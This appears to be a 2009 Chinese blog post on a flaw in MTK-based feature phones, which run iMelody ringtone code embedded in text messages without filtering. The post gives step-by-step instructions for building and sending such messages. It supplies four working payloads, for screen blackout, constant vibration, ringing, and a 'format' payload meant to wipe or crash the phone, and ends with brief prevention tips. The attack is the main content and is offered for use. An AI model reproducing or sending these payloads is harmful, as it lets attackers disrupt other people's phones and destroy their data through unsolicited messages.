作者:Pray
分类:安全防护
评论:59 个评论
影响手机品牌:所有MTK方案手机(也就是我们常说的山寨手机)
且 写短信时有【“选项”——“插入对象”——“我的铃声”】这一功能(大部分山寨手机都有此功能)
漏洞原理:
在大部分MTK方案手机中,编写短信息的时候可以插入一种“imy”格式的铃声文件,
而具有同样功能的手机接收到此短信后在查看信息内容的同时可以听到短信息内插入的铃声
由于MTK方案手机在阅读短信息的时候对“imy”文件内容不经过过滤而直接执行。
所以我们可以在“imy”文件内插入代码,通过代码调用手机的解码芯片发出一些声音甚至一些核心指令。
通过这种方式可实现对MTK方案手机的短信攻击。
操作方式:
在电脑上新建文本文档,写入代码,保存为“imy”格式文件。
将这个文件放入手机的“Audio”文件夹内。(注意,一定是手机的“Audio”文件夹,而非内存卡上。)
用手机编辑短信,“选项”——“插入对象”——“我的铃声”,选择你写的“imy”文件。
完成,发送…
黑屏代码:
1 2 3 4 | BEGIN:IMELODY BEAT:1200 MELODY:(ledoffbackoffvibeoffr5ledoffbackoffvibeoffr5@600) END:IMELODY |
猛震代码:
1 2 3 4 5 6 | BEGIN:IMELODY VERSION:1.2 FORMAT:CLASS1.0 BEAT:100 MELODY:(ledoffledonbackoffbackonvibeon@300) END:IMELODY |
振铃代码:
1 2 3 4 5 6 | BEGIN:IMELODY VERSION:1.2 FORMAT:CLASS1.0 BEAT:200 MELODY:(ledoffbackoffvibeonr5vibeoffledonbackonr5@200) END:IMELODY |
格式化代码:(请慎用)
1 2 3 4 5 6 7 | BEGIN:IMELODY VERSION:1.2 FORMAT:CLASS1.0 COMPOSER:MTK(23)Fomat BEAT:180 MELODY:backoffbackofffbackoffbackoffbackoffbackoffbackoffbackoffbackoff (+"@9999999999999999999999999">"++"@9999999999999999999999999)" |
注意:“@”后面的数字越大,重复次数越多
预防MTK手机漏洞:
MTK所有支持imy铃声的手机都会中招。至于预防,我想这是很难的,毕竟只要触发就会中招,只能是看到类似的短信立即关闭,不继续翻阅从而避免激活imy文件代码。当然,这只是相对的,如果对方发送的短信是先插入的imy文件再写文字的话,那就不可避免了。更好的方法,不要打开本地接受到的短信,用飞信接受对方发来的短信信息。
文章地址:http://blog.nodll.com/2009/12/21/4mtkbug/Pray.html
上一篇:写在09年的最后一天
下一篇:4款ICON图标搜索网站